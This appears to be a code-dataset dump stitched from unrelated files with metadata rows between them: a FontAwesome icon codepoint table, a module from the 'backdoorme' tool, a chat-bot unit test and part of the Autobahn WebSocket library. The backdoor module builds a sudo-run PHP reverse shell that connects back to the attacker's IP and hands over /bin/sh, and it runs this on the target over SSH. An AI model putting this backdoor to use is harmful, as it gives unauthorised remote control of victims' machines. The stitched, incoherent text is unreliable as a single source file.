("fa-minus", 0xf068),
("fa-minus-circle", 0xf056),
("fa-minus-square", 0xf146),
("fa-minus-square-o", 0xf147),
("fa-mobile", 0xf10b),
("fa-mobile-phone", 0xf10b),
("fa-money", 0xf0d6),
("fa-moon-o", 0xf186),
("fa-mortar-board", 0xf19d),
("fa-music", 0xf001),
("fa-navicon", 0xf0c9),
("fa-openid", 0xf19b),
("fa-outdent", 0xf03b),
("fa-pagelines", 0xf18c),
("fa-paper-plane", 0xf1d8),
("fa-paper-plane-o", 0xf1d9),
("fa-paperclip", 0xf0c6),
("fa-paragraph", 0xf1dd),
("fa-paste", 0xf0ea),
("fa-pause", 0xf04c),
("fa-paw", 0xf1b0),
("fa-pencil", 0xf040),
("fa-pencil-square", 0xf14b),
("fa-pencil-square-o", 0xf044),
("fa-phone", 0xf095),
("fa-phone-square", 0xf098),
("fa-photo", 0xf03e),
("fa-picture-o", 0xf03e),
("fa-pied-piper", 0xf1a7),
("fa-pied-piper-alt", 0xf1a8),
("fa-pied-piper-square", 0xf1a7),
("fa-pinterest", 0xf0d2),
("fa-pinterest-square", 0xf0d3),
("fa-plane", 0xf072),
("fa-play", 0xf04b),
("fa-play-circle", 0xf144),
("fa-play-circle-o", 0xf01d),
("fa-plus", 0xf067),
("fa-plus-circle", 0xf055),
("fa-plus-square", 0xf0fe),
("fa-plus-square-o", 0xf196),
("fa-power-off", 0xf011),
("fa-print", 0xf02f),
("fa-puzzle-piece", 0xf12e),
("fa-qq", 0xf1d6),
("fa-qrcode", 0xf029),
("fa-question", 0xf128),
("fa-question-circle", 0xf059),
("fa-quote-left", 0xf10d),
("fa-quote-right", 0xf10e),
("fa-ra", 0xf1d0),
("fa-random", 0xf074),
("fa-rebel", 0xf1d0),
("fa-recycle", 0xf1b8),
("fa-reddit", 0xf1a1),
("fa-reddit-square", 0xf1a2),
("fa-refresh", 0xf021),
("fa-renren", 0xf18b),
("fa-reorder", 0xf0c9),
("fa-repeat", 0xf01e),
("fa-reply", 0xf112),
("fa-reply-all", 0xf122),
("fa-retweet", 0xf079),
("fa-rmb", 0xf157),
("fa-road", 0xf018),
("fa-rocket", 0xf135),
("fa-rotate-left", 0xf0e2),
("fa-rotate-right", 0xf01e),
("fa-rouble", 0xf158),
("fa-rss", 0xf09e),
("fa-rss-square", 0xf143),
("fa-rub", 0xf158),
("fa-ruble", 0xf158),
("fa-rupee", 0xf156),
("fa-save", 0xf0c7),
("fa-scissors", 0xf0c4),
("fa-search", 0xf002),
("fa-search-minus", 0xf010),
("fa-search-plus", 0xf00e),
("fa-send", 0xf1d8),
("fa-send-o", 0xf1d9),
("fa-share", 0xf064),
("fa-share-alt", 0xf1e0),
("fa-share-alt-square", 0xf1e1),
("fa-share-square", 0xf14d),
("fa-share-square-o", 0xf045),
("fa-shield", 0xf132),
("fa-shopping-cart", 0xf07a),
("fa-sign-in", 0xf090),
("fa-sign-out", 0xf08b),
("fa-signal", 0xf012),
("fa-sitemap", 0xf0e8),
("fa-skype", 0xf17e),
("fa-slack", 0xf198),
("fa-sliders", 0xf1de),
("fa-smile-o", 0xf118),
("fa-sort", 0xf0dc),
("fa-sort-alpha-asc", 0xf15d),
("fa-sort-alpha-desc", 0xf15e),
("fa-sort-amount-asc", 0xf160),
("fa-sort-amount-desc", 0xf161),
("fa-sort-asc", 0xf0de),
("fa-sort-desc", 0xf0dd),
("fa-sort-down", 0xf0dd),
("fa-sort-numeric-asc", 0xf162),
("fa-sort-numeric-desc", 0xf163),
("fa-sort-up", 0xf0de),
("fa-soundcloud", 0xf1be),
("fa-space-shuttle", 0xf197),
("fa-spinner", 0xf110),
("fa-spoon", 0xf1b1),
("fa-spotify", 0xf1bc),
("fa-square", 0xf0c8),
("fa-square-o", 0xf096),
("fa-stack-exchange", 0xf18d),
("fa-stack-overflow", 0xf16c),
("fa-star", 0xf005),
("fa-star-half", 0xf089),
("fa-star-half-empty", 0xf123),
("fa-star-half-full", 0xf123),
("fa-star-half-o", 0xf123),
("fa-star-o", 0xf006),
("fa-steam", 0xf1b6),
("fa-steam-square", 0xf1b7),
("fa-step-backward", 0xf048),
("fa-step-forward", 0xf051),
("fa-stethoscope", 0xf0f1),
("fa-stop", 0xf04d),
("fa-strikethrough", 0xf0cc),
("fa-stumbleupon", 0xf1a4),
("fa-stumbleupon-circle", 0xf1a3),
("fa-subscript", 0xf12c),
("fa-suitcase", 0xf0f2),
("fa-sun-o", 0xf185),
("fa-superscript", 0xf12b),
("fa-support", 0xf1cd),
("fa-table", 0xf0ce),
("fa-tablet", 0xf10a),
("fa-tachometer", 0xf0e4),
("fa-tag", 0xf02b),
("fa-tags", 0xf02c),
("fa-tasks", 0xf0ae),
("fa-taxi", 0xf1ba),
("fa-tencent-weibo", 0xf1d5),
("fa-terminal", 0xf120),
("fa-text-height", 0xf034),
("fa-text-width", 0xf035),
("fa-th", 0xf00a),
("fa-th-large", 0xf009),
("fa-th-list", 0xf00b),
("fa-thumb-tack", 0xf08d),
("fa-thumbs-down", 0xf165),
("fa-thumbs-o-down", 0xf088),
("fa-thumbs-o-up", 0xf087),
("fa-thumbs-up", 0xf164),
("fa-ticket", 0xf145),
("fa-times", 0xf00d),
("fa-times-circle", 0xf057),
("fa-times-circle-o", 0xf05c),
("fa-tint", 0xf043),
("fa-toggle-down", 0xf150),
("fa-toggle-left", 0xf191),
("fa-toggle-right", 0xf152),
("fa-toggle-up", 0xf151),
("fa-trash-o", 0xf014),
("fa-tree", 0xf1bb),
("fa-trello", 0xf181),
("fa-trophy", 0xf091),
("fa-truck", 0xf0d1),
("fa-try", 0xf195),
("fa-tumblr", 0xf173),
("fa-tumblr-square", 0xf174),
("fa-turkish-lira", 0xf195),
("fa-twitter", 0xf099),
("fa-twitter-square", 0xf081),
("fa-umbrella", 0xf0e9),
("fa-underline", 0xf0cd),
("fa-undo", 0xf0e2),
("fa-university", 0xf19c),
("fa-unlink", 0xf127),
("fa-unlock", 0xf09c),
("fa-unlock-alt", 0xf13e),
("fa-unsorted", 0xf0dc),
("fa-upload", 0xf093),
("fa-usd", 0xf155),
("fa-user", 0xf007),
("fa-user-md", 0xf0f0),
("fa-users", 0xf0c0),
("fa-video-camera", 0xf03d),
("fa-vimeo-square", 0xf194),
("fa-vine", 0xf1ca),
("fa-vk", 0xf189),
("fa-volume-down", 0xf027),
("fa-volume-off", 0xf026),
("fa-volume-up", 0xf028),
("fa-warning", 0xf071),
("fa-wechat", 0xf1d7),
("fa-weibo", 0xf18a),
("fa-weixin", 0xf1d7),
("fa-wheelchair", 0xf193),
("fa-windows", 0xf17a),
("fa-won", 0xf159),
("fa-wordpress", 0xf19a),
("fa-wrench", 0xf0ad),
("fa-xing", 0xf168),
("fa-xing-square", 0xf169),
("fa-yahoo", 0xf19e),
("fa-yen", 0xf157),
("fa-youtube", 0xf167),
("fa-youtube-play", 0xf16a),
("fa-youtube-square", 0xf166) ]
FontAwesome = dict(( (code[0], unichr(code[1])) for code in _codepoints ))
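# Illustrative usage (not part of the original file): FontAwesome maps each icon name to
# the single unicode character at the corresponding codepoint, so for example
# FontAwesome['fa-adjust'] == unichr(0xf042). With the Font Awesome font loaded in a Qt
# widget, that character can be placed directly in label or button text, e.g.:
#
#     some_button.setText(FontAwesome['fa-cog'] + ' Settings')   # hypothetical widget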
|
mit
| -1,730,761,943,699,872,300
| 28.781676
| 88
| 0.544508
| false
| 2.376789
| false
| false
| false
|
Kkevsterrr/backdoorme
|
backdoors/shell/php.py
|
1
|
1529
|
from backdoors.backdoor import *
class Php(Backdoor):
prompt = Fore.RED + "(php) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using php module..."
self.core = core
self.options = {
"port" : Option("port", 53930, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Creates and runs a php backdoor which sends output to bash.\n"+INFO+"It does not automatically install a web server, but instead uses the php web module."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S php -r '$sock=fsockopen(\"" + self.core.localIP + "\"," + str(self.get_value("port")) + ");exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
#input("Please enter the following command: nc -v -n -l -p %s in another shell to connect." % port)
self.listen("none", "none")
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit(self.get_command())
# for mod in self.portModules.keys():
# print(INFO + "Attempting to execute " + mod.name + " module...")
# mod.exploit(self.get_port())
|
mit
| 8,837,472,853,760,200,000
| 45.333333
| 192
| 0.568999
| false
| 3.46712
| false
| false
| false
|
MeGotsThis/BotGotsThis
|
pkg/custom_command/tests/test_custom_query.py
|
1
|
1560
|
from lib.data.message import Message
from tests.unittest.base_custom import TestCustomField
# Needs to be imported last
from ..custom import query
class TestCustomCommandCustomQuery(TestCustomField):
def setUp(self):
super().setUp()
self.args = self.args._replace(field='query', message=Message('a b c'))
async def test(self):
self.args = self.args._replace(field='')
self.assertIsNone(await query.fieldQuery(self.args))
async def test_query(self):
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_caps(self):
self.args = self.args._replace(field='QUERY')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_default(self):
self.args = self.args._replace(message=Message(''),
prefix='[', suffix=']')
self.assertEqual(await query.fieldQuery(self.args), '')
async def test_prefix(self):
self.args = self.args._replace(prefix='[')
self.assertEqual(await query.fieldQuery(self.args), '[b c')
async def test_prefix_blank(self):
self.args = self.args._replace(prefix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_suffix(self):
self.args = self.args._replace(suffix=']')
self.assertEqual(await query.fieldQuery(self.args), 'b c]')
async def test_suffix_blank(self):
self.args = self.args._replace(suffix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
|
gpl-3.0
| 4,702,043,906,517,372,000
| 35.27907
| 79
| 0.642308
| false
| 3.823529
| true
| false
| false
|
bzero/bitex
|
libs/autobahn/websocket.py
|
1
|
156783
|
###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ["createWsUrl",
"parseWsUrl",
"connectWS",
"listenWS",
"HttpException",
"ConnectionRequest",
"ConnectionResponse",
"Timings",
"WebSocketProtocol",
"WebSocketFactory",
"WebSocketServerProtocol",
"WebSocketServerFactory",
"WebSocketClientProtocol",
"WebSocketClientFactory"]
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from pprint import pformat
from array import array
from collections import deque
from twisted.internet import reactor, protocol
from twisted.python import log
from _version import __version__
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, createXorMasker
from httpstatus import *
from util import Stopwatch
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSocket ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
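# Illustrative example (not part of the original file): given the rules above, one
# would expect
#
#     createWsUrl("localhost", 9000, path = "/chat", params = {"token": "abc"})
#
# to return "ws://localhost:9000/chat?token=abc", and
#
#     createWsUrl("example.com", isSecure = True)
#
# to return "wss://example.com:443/".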
def parseWsUrl(url):
"""
Parses a WebSocket URL into its components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
params is the /query/ component properly unescaped and returned as a dictionary.
:param url: A valid WebSocket URL, i.e. `ws://localhost:9000/myresource?param1=23&param2=666`
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSocket connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A `twisted.internet.ssl.ClientContextFactory <http://twistedmatrix.com/documents/current/api/twisted.internet.ssl.ClientContextFactory.html>`_ instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which implements `twisted.interface.IConnector <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IConnector.html>`_.
"""
if factory.proxy is not None:
if factory.isSecure:
raise Exception("WSS over explicit proxies not implemented")
else:
conn = reactor.connectTCP(factory.proxy['host'], factory.proxy['port'], factory, timeout, bindAddress)
else:
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that implements `twisted.interface.IListeningPort <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html>`_.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
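## Illustrative usage sketch (not part of the library): listening with a server
## factory, where MyServerProtocol is a hypothetical WebSocketServerProtocol
## subclass defined by the application:
##
##   factory = WebSocketServerFactory("ws://localhost:9000")
##   factory.protocol = MyServerProtocol
##   listenWS(factory)
##   reactor.run()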
class FrameHeader:
"""
Thin-wrapper for storing WebSocket frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException:
"""
Throw an instance of this class to deny a WebSocket connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
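## Illustrative usage sketch (not part of the library): denying a connection
## during the opening handshake from a server protocol's onConnect(); the
## subprotocol name "chat" is a hypothetical example:
##
##   def onConnect(self, connectionRequest):
##      if "chat" not in connectionRequest.protocols:
##         raise HttpException(400, "this server only speaks the 'chat' subprotocol")
##      return "chat"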
class ConnectionRequest:
"""
Thin-wrapper for WebSocket connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSocket
client establishes a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `/myservice`.
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `{'foo': ['23', '66'], 'bar': ['2']}`.
:type params: dict of arrays of strings
:param version: The WebSocket protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSocket origin header or None. Note that this is only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSocket (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSocket extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSocket connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSocket
client has established a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSocket protocol version that is spoken.
:type version: int
:param protocol: The WebSocket (sub)protocol in use.
:type protocol: str
:param extensions: The WebSocket extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of an HTTP request header (the data up to the \n\n line) into a
tuple of status line, HTTP headers dictionary and HTTP headers count dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
:returns: tuple -- Tuple of HTTP status line, headers and headers count.
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
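## Illustrative usage sketch (not part of the library): parsing a minimal,
## hypothetical opening handshake request:
##
##   status, headers, count = parseHttpHeader("GET /chat HTTP/1.1\r\nHost: example.com\r\nUpgrade: websocket\r\n")
##   ## => status  = "GET /chat HTTP/1.1"
##   ##    headers = {'host': u'example.com', 'upgrade': u'websocket'}
##   ##    count   = {'host': 1, 'upgrade': 1}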
class Timings:
"""
Helper class to track timings by key. This class also supports item access,
iteration and conversion to string.
"""
def __init__(self):
self._stopwatch = Stopwatch()
self._timings = {}
def track(self, key):
"""
Track elapsed time for key.
:param key: Key under which to track the timing.
:type key: str
"""
self._timings[key] = self._stopwatch.elapsed()
def diff(self, startKey, endKey, format = True):
"""
Get elapsed difference between two previously tracked keys.
:param startKey: First key for interval (older timestamp).
:type startKey: str
:param endKey: Second key for interval (younger timestamp).
:type endKey: str
:param format: If `True`, format computed time period and return string.
:type format: bool
:returns: float or str -- Computed time period in seconds (or formatted string).
"""
if self._timings.has_key(endKey) and self._timings.has_key(startKey):
d = self._timings[endKey] - self._timings[startKey]
if format:
if d < 0.00001: # 10us
s = "%d ns" % round(d * 1000000000.)
elif d < 0.01: # 10ms
s = "%d us" % round(d * 1000000.)
elif d < 10: # 10s
s = "%d ms" % round(d * 1000.)
else:
s = "%d s" % round(d)
return s.rjust(8)
else:
return d
else:
if format:
return "n.a.".rjust(8)
else:
return None
def __getitem__(self, key):
return self._timings.get(key, None)
def __iter__(self):
return iter(self._timings)
def __str__(self):
return pformat(self._timings)
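## Illustrative usage sketch (not part of the library): tracking two points in
## time and printing the formatted difference:
##
##   timings = Timings()
##   timings.track("begin")
##   ## ... do some work ...
##   timings.track("end")
##   print timings.diff("begin", "end")   ## e.g. "   12 ms"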
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSocket. This class is used by both the WebSocket
client and server protocol implementations. It is unusable standalone; for example,
the WebSocket initial handshake is implemented differently in the derived classes
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSocket protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicates actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 18
"""
Default WebSocket protocol spec version this implementation speaks: final RFC6455.
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow speaking the obsolete
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
_WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455).
"""
_QUEUED_WRITE_DELAY = 0.00001
"""
For synched/chopped writes, this is the reactor reentry delay in seconds.
"""
MESSAGE_TYPE_TEXT = 1
"""
WebSocket text message type (UTF-8 payload).
"""
MESSAGE_TYPE_BINARY = 2
"""
WebSocket binary message type (arbitrary binary payload).
"""
## WebSocket protocol state:
## (STATE_PROXY_CONNECTING) => STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
STATE_PROXY_CONNECTING = 4
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSocket protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSocket handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
self.message_data_total_length += length
if not self.failedByMe:
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
def onMessageFrameData(self, payload):
"""
Callback when receiving data within a message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
if self.trackedTimings:
self.trackedTimings.track("onMessage")
